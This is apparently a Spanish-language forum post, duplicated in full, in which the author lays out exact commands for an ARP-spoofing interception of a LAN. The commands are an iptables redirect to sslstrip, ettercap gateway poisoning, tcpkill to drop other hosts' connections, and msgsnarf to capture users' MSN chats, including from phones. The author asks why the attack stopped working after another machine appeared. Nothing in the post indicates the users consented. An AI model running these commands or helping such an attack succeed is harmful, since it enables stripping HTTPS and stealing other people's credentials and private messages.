Tengo un problema con una red lan.
Anteriormente podia ejecutar el ettercap + sslstrip y podia esnifear https, amen de los errores clasicos del sslstrip (por lo de el udp)
Aqui posteo:
Terminal1:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f
Termina2
ettercap -Tqi eth1 -M arp:remote // /gateway/ -P autoadd
En ocasiones usaba el tcpkill a toda la subred excepto mi ip, a ciertos hosts, etc
Podia usar el msgsnarf y capturaba el msn. Esto incluyendo los Blacberry y los iphone.
Hasta aqui todo se capturaba.
Despues de algun tiempo, ya no puedo esnifear nada.
Me extrano que no podia capturar nada, lo que hice fue tratar de matar conexiones con tcpkill, y nada tampoco. corri el msgsnarf, para ver si podia esnifear el msn, y nada tampoco...
Esto lo habia hecho anteriormente y funciono...
Corri el nmap para ver que sucedia y en una de las PC's, me extranio ver en el puerto 5835 un httpd v2. Un Apache? en una laptop del usuario?
ademas de que anteriormente, el nmap me mostraba solo su ip y su mac, ahora me presentaba el nombre de la pc.lan, su ip y su mac...Me extranio el "nombre.lan"
Al entrar al enrutador, las ip del wifi me las mostraba con el mismo nombre todas, esto es:
pc1 = nombrex
pc2= nombrex
pc3=nombrex
y asi sucesivamente.
Anteriormente me presentaba:
pc1 = mi pc
pc2 = laptop Dell
etc.
Me extranio tambien que al correr el nmap asi:
nmap -sC -sS -sV -O --osscan-guess 192.168.1.0/24
no me presenta una pc..
Esta pc la detecte con nmap -sP 192.168.1.0/24 y estaba en el enrutador como una pc4..
Por eso me extranio no ver esa pc en el primer nmap sino solo con nmap -sP.
Como dato adicional, el enrutador es un Thompson y el la opcion de DNS (configurar, viene la ip de la laptop con el apache, el nombre x y su ip (la ip me la muestra el nmap tambien).
Pero no siempre esta prendida la laptop con el httpd..
No me permite hacer ping a la laptop con el Apache...
Alguna idea de lo que pasa?
Anteriormente podia ejecutar el ettercap + sslstrip y podia esnifear https, amen de los errores clasicos del sslstrip (por lo de el udp)
Aqui posteo:
Terminal1:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f
Termina2
ettercap -Tqi eth1 -M arp:remote // /gateway/ -P autoadd
En ocasiones usaba el tcpkill a toda la subred excepto mi ip, a ciertos hosts, etc
Podia usar el msgsnarf y capturaba el msn. Esto incluyendo los Blacberry y los iphone.
Hasta aqui todo se capturaba.
Despues de algun tiempo, ya no puedo esnifear nada.
Me extrano que no podia capturar nada, lo que hice fue tratar de matar conexiones con tcpkill, y nada tampoco. corri el msgsnarf, para ver si podia esnifear el msn, y nada tampoco...
Esto lo habia hecho anteriormente y funciono...
Corri el nmap para ver que sucedia y en una de las PC's, me extranio ver en el puerto 5835 un httpd v2. Un Apache? en una laptop del usuario?
ademas de que anteriormente, el nmap me mostraba solo su ip y su mac, ahora me presentaba el nombre de la pc.lan, su ip y su mac...Me extranio el "nombre.lan"
Al entrar al enrutador, las ip del wifi me las mostraba con el mismo nombre todas, esto es:
pc1 = nombrex
pc2= nombrex
pc3=nombrex
y asi sucesivamente.
Anteriormente me presentaba:
pc1 = mi pc
pc2 = laptop Dell
etc.
Me extranio tambien que al correr el nmap asi:
nmap -sC -sS -sV -O --osscan-guess 192.168.1.0/24
no me presenta una pc..
Esta pc la detecte con nmap -sP 192.168.1.0/24 y estaba en el enrutador como una pc4..
Por eso me extranio no ver esa pc en el primer nmap sino solo con nmap -sP.
Como dato adicional, el enrutador es un Thompson y el la opcion de DNS (configurar, viene la ip de la laptop con el apache, el nombre x y su ip (la ip me la muestra el nmap tambien).
Pero no siempre esta prendida la laptop con el httpd..
No me permite hacer ping a la laptop con el Apache...
Alguna idea de lo que pasa?